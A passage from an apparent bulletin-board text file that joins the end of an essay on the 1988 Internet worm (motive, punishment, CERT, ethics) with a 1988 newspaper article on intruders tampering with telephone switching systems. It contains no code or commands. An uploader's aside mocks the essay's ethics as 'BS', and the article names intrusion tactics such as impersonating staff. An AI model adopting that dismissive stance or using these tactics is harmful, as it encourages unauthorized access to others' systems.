something about Internet security, or that he was trying a harmless
experiment.  Even the president of the ACM, Bryan Kocher, stated that it was
a prank in [7].  It is curious that this many people, both journalists and
computer professionals alike, would assume to know the intent of the author
based on the observed behavior of the program.  As Rick Adams of the Center
for Seismic Studies observed in a posting to the Usenet, we may someday hear
that the worm was actually written to impress Jodie Foster--we simply do not
know the real reason.

Coupled with this tendency to assume motive, we have observed very different
opinions on the punishment, if any, to mete out to the author.  One
oft-expressed opinion, especially by those individuals who believe the worm
release was an accident or an unfortunate experiment, is that the author
should not be punished.  Some have gone so far as to say that the author
should be rewarded and the vendors and operators of the affected machines
should be the ones punished, this on the theory that they were sloppy about
their security and somehow invited the abuse!

The other extreme school of thought holds that the author should be severely
punished, including a term in a federal penitentiary. (One somewhat humorous
example of this point of view was espoused by syndicated columnist Mike
Royko.)

As has been observed in both [2] and [6], it would not serve us well to
overreact to this particular incident.   However, neither should we dismiss
it as something of no consequence.  The fact that there was no damage done
may have been an accident, and it is possible that the author intended for
the program to clog the Internet as it did.  Furthermore, we should be wary
of setting dangerous precedent for this kind of behavior.  Excusing acts of
computer vandalism simply because the authors claim there was no intent to
cause damage will do little to discourage repeat offenses, and may, in fact,
encourage new incidents.

The claim that the victims of the worm were somehow responsible for the
invasion of their machines is also curious.  The individuals making this
claim seem to be stating that there is some moral or legal obligation for
computer users to track and install every conceivable security fix and
mechanism available.  This completely ignores the fact that many sites run
turnkey systems without source code or knowledge of how to modify their
systems.  Those sites may also be running specialized software or have
restricted budgets that prevent them from installing new software versions.
Many commercial and government sites operate their systems in this way.  To
attempt to blame these individuals for the success of the worm is equivalent
to blaming an arson victim for the fire because she didn't build her house of
fireproof metal.  (More on this theme can be found in [17].)

The matter of appropriate punishment will likely be decided by a federal
judge.  A grand jury in Syracuse, N.Y., has been hearing testimony on the
matter.  A federal indictment under the United States Code, Title 18, Section
1030 (the Computer Crime statute), parts (a)(3) or (a)(5) might be returned.
Section (a)(5), in particular, is of interest.  That part of the statute
makes it a felony if an individual "intentionally accesses a federal interest
computer without authorization, and by means of one or more instances of such
conduct alters, damages, or destroys information . . . , or prevents
authorized use of any such computer or information and thereby causes loss to
one or more others of a value aggregating $1,000 or more during any one year
period" (emphasis added).  State and civil suits might also be brought in
this case.

Worm Hunters

A significant conclusion reached at the NCSC post-mortem workshop was that
the reason the worm was stopped so quickly was due almost solely to the UNIX
"old-boy" network, and not due to any formal mechanism in place at the time.
A recommendation from that workshop was that a formal crisis center be
established to deal with future incidents and to provide a formal point of
contact for individuals wishing to report problems.  No such center was
established at that time.

On November 29, 1988, someone exploiting a security flaw present in older
versions of the FTP file transfer program broke into a machine on the MILNET.
The intruder was traced to a machine on the Arpanet, and to immediately
prevent further access, the MILNET/Arpanet links were severed.  During the
next 48 hours there was considerable confusion and rumor about the
disconnection, fueled in part by the Defense Communication Agency's attempt
to explain the disconnection as a "test" rather than as a security problem.

This event, coming as close as it did to the worm incident, prompted DARPA to
establish the CERT--the Computer Emergency Response Team--at the Software
Engineering Institute at Carnegie Mellon University.  The purpose of CERT is
to act as a central switchboard and coordinator for computer security
emergencies on Arpanet and MILnet computers.  The Center has asked for
volunteers from federal agencies and funded laboratories to serve as
technical advisors when needed.

Of interest here is that CERT is not chartered to deal with any Internet
emergency.  Thus, problems detected in the CSnet, Bitnet, NSFnet, and other
Internet communities may not be referable to the CERT.  I was told that it is
the hope of CERT personnel that these other networks will develop their own
CERT-like groups.  This, of course, may make it difficult to coordinate
effective action and communication during the next threat.  It may even
introduce rivalry in the development and dissemination of critical
information.

Also of interest is the composition of the personnel CERT is enlisting as
volunteers.  Apparently there has been little or no solicitation of expertise
among the industrial and academic computing communities.  This is precisely
where the solution to the worm originated.  The effectiveness of this
organization against the next Internet-wide crisis will be interesting to
note.

CONCLUSIONS

All the consequences of the Internet worm incident are not yet known; they
may never be.  Most likely there will be changes in security consciousness
for at least a short period of time.  There may also be new laws and new
regulations from the agencies governing access to the Internet.  Vendors may
change the way they test and market their products--and not all of the
possible changes will be advantageous to the end-user (e.g., removing the
machine/host equivalence feature for remote execution).  Users' interactions
with their systems may change as well.  It is also possible that no
significant change will occur anywhere.  The final benefit or harm of the
incident will only become clear with the passage of time.

It is important to note that the nature of both the Internet and UNIX helped
to defeat the worm as well as spread it.  The immediacy of communication, the
ability to copy source and binary files from machine to machine, and the
widespread availability of both source and expertise allowed personnel
throughout the country to work together to solve the infection despite the
widespread disconnection of parts of the network.  Although the immediate
reaction of some people might be to restrict communication or promote a
diversity of incompatible software options to prevent a recurrence of a worm,
that would be an inappropriate reaction.  Increasing the obstacles to open
communication or decreasing the number of people with access to in-depth
information will not prevent a determined hacker--it will only decrease the
pool of expertise and resources available to fight such an attack.  Further,
such an attitude would be contrary to the whole purpose of having an open,
research-oriented network. The worm was caused by a breakdown of ethics as
well as lapses in security--a purely technological attempt at prevention will
not address the full problem, and may just cause new difficulties.

What we learn from this about securing our systems will help determine if
this is the only such incident we ever need to analyze.  This attack should
also point out that we need a better mechanism in place to coordinate
information about security flaws and attacks.  The response to this incident
was largely ad hoc, and resulted in both duplication of effort and a failure
to disseminate valuable information to sites that needed it.  Many site
administrators discovered the problem from reading newspapers or watching
television.  The major sources of information for many of the sites affected
seems to have been Usenet news groups and a mailing list I put together when
the worm was first discovered.  Although useful, these methods did not ensure
timely, widespread dissemination of useful information--especially since they
depended on the Internet to work!  Over three weeks after this incident some
sites were still not reconnected to the Internet.  The worm has shown us that
we are all affected by events in our shared environment, and we need to
develop better information methods outside the network before the next
crisis.  The formation of the CERT may be a step in the right direction, but
a more general solution is still needed.

Finally, this whole episode should prompt us to think about the ethics and
laws concerning access to computers.  The technology we use has developed so
quickly it is not always easy to determine where the proper boundaries of
moral action should be.  Some senior computer professionals started their
careers years ago by breaking into computer systems at their colleges and
places of employment to demonstrate their expertise and knowledge of the
inner workings of the systems.  However, times have changed and mastery of
computer science and computer engineering now involves a great deal more than
can be shown by using intimate knowledge of the flaws in a particular
operating system.  Whether such actions were appropriate fifteen years ago
is, in some senses, unimportant.  I believe it is critical to realize that
such behavior is clearly inappropriate now.  Entire businesses are now
dependent, wisely or not, on the undisturbed functioning of computers.  Many
people's careers, property, and lives may be placed in jeopardy by acts of
computer sabotage and mischief.

As a society, we cannot afford the consequences of such actions. As
professionals, computer scientists and computer engineers cannot afford to
tolerate the romanticization of computer vandals and computer criminals, and
we must take the lead by setting proper examples.  Let us hope there are no
further incidents to underscore this lesson.

{Pretty cool except for those last two paragraphs of BS huh?}


Subject: Penetrating the Phone System
     
PERSONAL COMPUTER USERS PENETRATING NATION`S TELEPHONE SYSTEM
By JOHN MARKOFF with ANDREW POLLACK (c.1988 N.Y. Times News Service)
     

adept at penetrating the nation's telephone system, raising questions about the
security and privacy of the phone system, industry experts and law enforcement
offiials say.  The vulnerability of the phone system to such tampering has
grown significantly in the past decade or so as telephone companies have
largely replaced electro-mechanical call-routing equipment with
computer-controlled switches.
  As a result, people with the expertise can illegally connect their personal
computers to the phone network. With the proper commands, these intruders can
do such things as eavesdrop, add calls to someone's bill, alter or destroy
data, have all calls to a particular number automatically forwarded to another
number or keep someone's line permanently busy, it was disclosed in an internal
memorandum written by a manager of electronic security operations at the San
Francisco-based Pacific Bell Telephone Co. and in interviews with company
officials.
  Peter Neumann, a computer security consultant at SRI International Inc. in
Menlo Park, Calif., said telephone companies are only beginning to awaken to
the security problems created by the increasing computerization of the
telephone network.  ``As far as our vulnerability, we all have our heads in the
sand,'' he said. ``We have to redefine our notions of what we entrust to
computers and to communication networks.''
  Some personal computer enthusiasts, often called ``hackers,'' view the task
of breaking into the telephone system as a test of their skills and only
infrequently inflict damage, industry officials and consultants say. But others
act with criminal intent.
  In his memo, the Pacific Bell security manager also warned that an electronic
intruder could essentially disable an entire central switching office for
routing calls, disrupting telephone service to entire neighborhoods.
Furthermore, he said, organized-crime groups or terrorists might use such
technology to their own advantage.
  The integrity of customer bills could also be compromised, he said. Customers
might rightfully or wrongfully dispute expensive calls, claiming the calls were
placed on their bills by computer hackers.
  Earlier this month, a teen-age computer enthusiast who requested anonymity
provided The New York Times with the Pacific Bell memo, which was written a
year ago. He said it had been obtained by a fellow hacker who illicitly
eavesdropped on a facsimile transmission between Pacific Bell offices in San
Francisco.  The memo, which Pacific Bell verified as authentic, concluded that
``the number of individuals capable of entering Pacific Bell operating systems
is growing'' and that ``computer hackers are becoming more sophisticated in
their attacks.''
  In one of two cases cited in the memo, a group of teen-age computer hobbyists
were able to do such things as ``monitor each other's lines for fun'' and
``seize another person's dial tone and make calls appear on their bill,'' the
memo said. One of the hackers used his knowledge to disconnect and tie up the
telephone services of people he did not like. In addition, ``he would add
several custom-calling features to their lines to create larger bills,'' the
memo said.
  In the second case, police searched the Southern California home of a man
thought to be breaking into the computers of a Santa Cruz, Calif., software
company. They discovered the man could also gain access to all of Pacific
Bell's Southern California switching computers.  wFiles were found containing
codes and employee passwords for connecting with -- or ``logging on to'' -- the
Pacific Bell switching systems and related computers. The man also had commands
for controlling the equipment.
  In another case involving tampering with telephone company switching
equipment, local police and the FBI in the San Francisco area are investigating
Kevin Poulsen, a former programmer at Sun Microsystems, said Joseph Burton, an
assistant U.S. attorney in San Jose, and John Glang, a deputy district attorney
for San Mateo County.
  Authorities searched Poulsen's apartment in Menlo Park in February as well as
the residence of a suspected accomplice in San Francisco, the officials said.
Poulsen was said to be in Southern California and was unavailable for comment.
  Burton said he could not discuss a current investigation. Glang would say
only that the case had been taken over by the federal government because
``there are some potential national security overtones.''  But a security
expert familiar with the case, who requested anonymity, said that Poulsen
``pretty clearly demonstrated you can get in and romp around inside a Bell
operating system.''  ``What it pointed out,'' he said, ``was the serious
vulnerability.''
  Security consultants said other phone companies are equally vulnerable to
such breaches. They noted that most phone service in the nation is provided by
companies that were part of the Bell System until it was broken up in 1984 and
still use similar equipment and procedures.
  Michigan Bell officials said they had caught an intruder who tampered with
the company's switching equipment last year. A spokesman declined to give
details of the incident but said no arrest was made. ``We have been able to
tighten our security arrangements,'' said Phil Jones, a company spokesman.
``There were lessons to be learned here.''
  Jack Hancock, vice president for information systems at Pacific Bell, said
his company had also taken steps to make it tougher to penetrate its systems.
He said, however, that the company had to strike a balance between security and
cost considerations so the phone system would still be widely affordable and
easy to maintain.
  ``We could secure the telephone system totally, but the cost would be
enormous,'' he said. ``A public service will probably always have certain
insecurities in it.''
  Though Pacific Bell refused to disclose the security measures it had taken,
the company said it had restricted the ability to dial into its computers from
remote points.
  As computerized communications become more sophisticated, companies will be
able to improve security at a reasonable cost, said Barry K. Schwartz, a
systems planning manager at Bell Communications Research, which does research
for the seven Bell operating companies.  It will be increasingly possible to
program a computer so it will only answer a call from an authorized phone, he
said. Another new technology on the horizon, he said, is electronic voice
verification. A security system using this technology would be able to
recognize those authorized to gain access to a computer by their voice
patterns.
  Telephone companies have long had to worry about electronic abuse of their
networks.  For several decades individuals have used electronic equipment to
make long-distance phone calls for free. Some have used devices that generate a
series of tones that provides access to long-distance lines. Telephone
companies have installed equipment on their lines to detect and thwart such
abuse.  In other instances, people have used personal computers to find
long-distance access codes belonging to other users. They do this by
programming computers to keep trying various numbers until they hit upon one
that works.  But while costly, these kinds of abuse are not much of a threat to
the integrity of the system because they do not affect the system itself.
  The new problems involving network tampering are arising, experts say,
because the switches that route calls are now mostly electronic, meaning they
are essentially big computers. If a customer wants an option like call
forwarding or call waiting added to his or her telephone service, that is done
by typing commands into a computer, not by moving wires and switches.
  Pacific Bell said 79 percent of its customers are now served by computerized
switching systems.  Experts say these electronic networks are especially
vulnerable to tampering because it is possible to dial up the computers
controlling the switches from the outside. Phone companies designed their
systems this way to make it easier for them to change the system and diagnose
problems.  For example, a technician in the field trying to diagnose problems
on a line needs to be able to dial certain test circuits in the central office.
But such a dial-up capability can also be used by outsiders with personal
computers and modems who know the proper numbers to call and the proper
procedures to get on the system.
  The ability to eavesdrop on telephone calls is included in the system to
allow an operator to check to see whether a line that is busy for a long time
is being used or whether the phone is off the hook or the line is broken.
  One security consultant who requested anonymity said this capability had also
made it much easier for law enforcement officials to wiretap a line. When the
police receive court permission to conduct a wiretap, they can have the phone
company dial up the switch serving the line so conversations can be monitored
from a remote location.  Obtaining the information needed to break into the
phone system can be difficult, but intruders often do it by impersonating phone
company employees -- a practice that hackers call ``social engineering.''
  A teen-ager interviewed by Pacific Bell officials after his arrest told
investigators that he had entered a number of Pacific Bell facilities in the
San Francisco area disguised as a Federal Express delivery man in order to
search for manuals and other documents, according to the company memo. The
youth also said he had impersonated telephone security officials to obtain
passwords and other information.
     


DOWNLOADED FROM P-80 SYSTEMS.....
